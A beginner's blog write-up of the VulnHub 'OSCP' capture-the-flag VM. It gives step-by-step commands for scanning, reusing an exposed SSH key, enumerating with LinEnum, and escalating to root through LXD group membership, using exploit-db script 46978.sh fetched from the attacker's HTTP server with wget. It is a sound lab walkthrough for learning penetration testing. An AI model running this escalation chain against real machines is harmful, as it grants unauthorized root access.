CTF Write-Up: The OSCP Challenge
![[ ryn0f1sh ]](https://miro.medium.com/v2/resize:fill:88:88/1*AhWbtFBeOM1v25_j4jrrXA.png){kind=small}
Hello friends,
In July of 2020, a neat challenge appeared in the VulnHub page. It was an OSCP Challenge.
The creator FalconSpy did a great write up of the VM, and the many ways to solve it.
It was marked as “Easy”, keep in mind this term is used frequently, but in actuality, there is no specific way to measure the “easy-ness” of any of these challenges, so it is left to the creator to decided that.
I am a beginner, in the pen testing / cyber / hacking field, and I have come to find out, that all of the “easy” challenge I’ve come across (including this one) should be considered “Intermediate” for anyone who is a beginner, so I approach all challenges with that mentality, and that does help.
These challenges are usually designed to be solved in multiple ways, because we all approach it differently, I used the methods that I know, I’ve had to do some research and tried many things that didn’t work, so your experience may vary.
An expert hacker I know, was able to solve it in 45 minutes.
Me? It took me 3 weeks, but I did solve it, and if I can do it, so can you.
The Goal of the OSCP challenge:
1. Become root.
2. Read the “flag.txt” located in root directory.
Lets get started.
//SCAN
After making sure the VM is running you now must find its IP. Usually one of these would do the trick for you.
netdiscover
arp-scan -L
arp-scan — interface=wlan0 — localnet (wifi)
arp-scan — interface=eth0 — localnet (cabled)
Neat Trick:
When you set up your VM, you can change the MAC address to something that would make it easy for you to identify that it’s the right machine.
//BROWSE
Now that I have an IP, I open up a browser and go to it, it is a landing page with general information about the challenge, but as I read closely I noticed a couple of things.
- They say the only user on this box is “OSCP”.
Yet the post is made by an ‘admin’ account.
2. Its a wordpress site.
//MASSCAN
This tool does a quicker scan than nmap, but due to its quickness, it may miss something.
masscan [the VM’s IP] -p0–65535 — rate 5000
Results:
33060/tcp on [the VM’s IP]
80/tcp on [the VM’s IP]
22/tcp on [the VM’s IP]
My friend was also doing this challenge and he ran an nmap scan since I was doing the masscan, and he came across a “/secret.txt” finding, so that was my next step.
//SECRET PAGE
On the browser I went to that page.
[the VM’s IP]/secret.txt
It was a text file of an open SSH key.
Save it locally, and called it “sk3”.
Had to adjust its permissions in order for it to work.
chmod 600 sk3.
Tried SSH-ing as admin with that key.
ssh -i sk3 admin@[the VM’s IP]
Didn’t work
Tried the root account
ssh -i sk3 root@[the VM’s IP]
Didn’t work.
Then I remembered the post about OSCP being a user on this machine so I tried this.
ssh -i sk3 oscp@[the VM’s IP]
That worked! I’m in the system.
//TOUCH STUFF
Now that I’m in, I need to know what kind of things I can do. An easy way is the “touch” command. So I typed this.
touch anything
That worked, it created a file called “anything”, so that told me that I have the ability to create things. Excellent.
So I created a directory (folder) called ryno
mkdir ryno
I move into it
cd ryno
//ENUMERATE
Out of the tools that I’ve tried, “linENUM” gave me the result I needed, but the trick with linENUM is it has to run in the machine your attaching, so while logged in (and in my ryno folder) I had to download that file and run it.
LinENUM
Its a git hub repo, so you run the “git clone” command to get it.
git clone https://github.com/rebootuser/LinEnum.git
Now, you have to make the “LinEnum.sh” file executable. So navigate to where the file is located, and run this command.
chmod +x LinEnum.sh
Now, you can run it, this is the command that gave me some nice results.
./LinEnum.sh -k keyword -r report -e /tmp/ -t
LinEnum Result:
Tells us we are part of the (lxd) group.
I’m not familiar with that group, so I go to The Oracle (aka Google) to learn more about LXD (Linux Daemon).
Apparently there is an LXC/LXD Priviledge Escalaction (Priv Esc).
So I research how this is done, for my next step.
//PRIV ESC
I needed 3 things for this to work:
[1] — The Alpine Builder File.
[2] — An .sh file with the lxc/lxd exploit.
[3] — A way to get it loaded into the VM to run the exploit.
[1] — The Alpine File.
Download the “Apline Builder”.
git clone https://github.com/saghul/lxd-alpine-builder.git
Navigate into the folder you just cloned.
cd lxd-alpine-builder
chmod +x & run the following file.
./build-alpine
That creates a tar file that we will need to upload to the machine.
alpine-v3.12-x86_64–20200801_2112.tar.gz
[2] — The .sh File
I used searchspolit in my terminal to find the exploit.
searchspolit lxd
You are looking for “linux/local/46978.sh”
Copy it over locally.
searchsploit -m 46978.sh
To be safe I made a copy called “ryno.sh”
cp 46978.sh > ryno.sh
When I tried to run that file, it gave me “bash\r” error.
After some research I found a way to created a new file removing the ‘\r’ and called it ‘r2.sh’, which fixed that issue.
sed $’s/\r$//’ ./ryno.sh > ./r2.sh
[3] — The PYTHON server
This is how I will upload the file from my local box to the VM I’m attacking.
On my machine:
Made sure I’m in the same folder that the Alpine & the r2.sh file are.
Ran this command.
python -m SimpleHTTPServer
(that creates the server (your ip) with port 8000)
On the VM machine:
Since I’m SSH-ed in, I upload the 2 files.
Make sure your in the folder that you had created earlier.
Upload the alpine file.
wget http://<your ip>:8000/alpine-v3.12-x86_64–20200801_2112.tar.gz
Upload the r2.sh.
wget http://<your ip>:8000/r2.sh
We need to adjust the permissions for BOTH files in order for it to work.
chmod 777 “both files”
Note:
Instructions may tell you to go to /tmp, but if you do, it may not work for you, and give you a “file not found” error, so its safer to do all of this from the directory you created.
//LETS RUN
Now that we have everything place, lets run the exploit.
I used this command.
./r2.sh -f alpine-v3.12-x86_64–20200801_2112.tar.gz
If you get a “command not found” for LXC, you just need to add it to the PATH.
Find the location of‘lxc’.
locate lxc
It was located in the following area:
/snap/bin/Now lets add it to the $PATH
echo $PATH
export PATH=”$PATH:/snap/bin”
That should fix it.
When that exploit runs properly, you will see a different shell prompt.
Check who you are.
id
(you should be root)
Lets get to the flag.
cd /mnt/root/root
ls
(you should see the flag.txt and read it)
Challenge completed.
[R/F]
![[ ryn0f1sh ]](https://miro.medium.com/v2/resize:fill:144:144/1*AhWbtFBeOM1v25_j4jrrXA.png)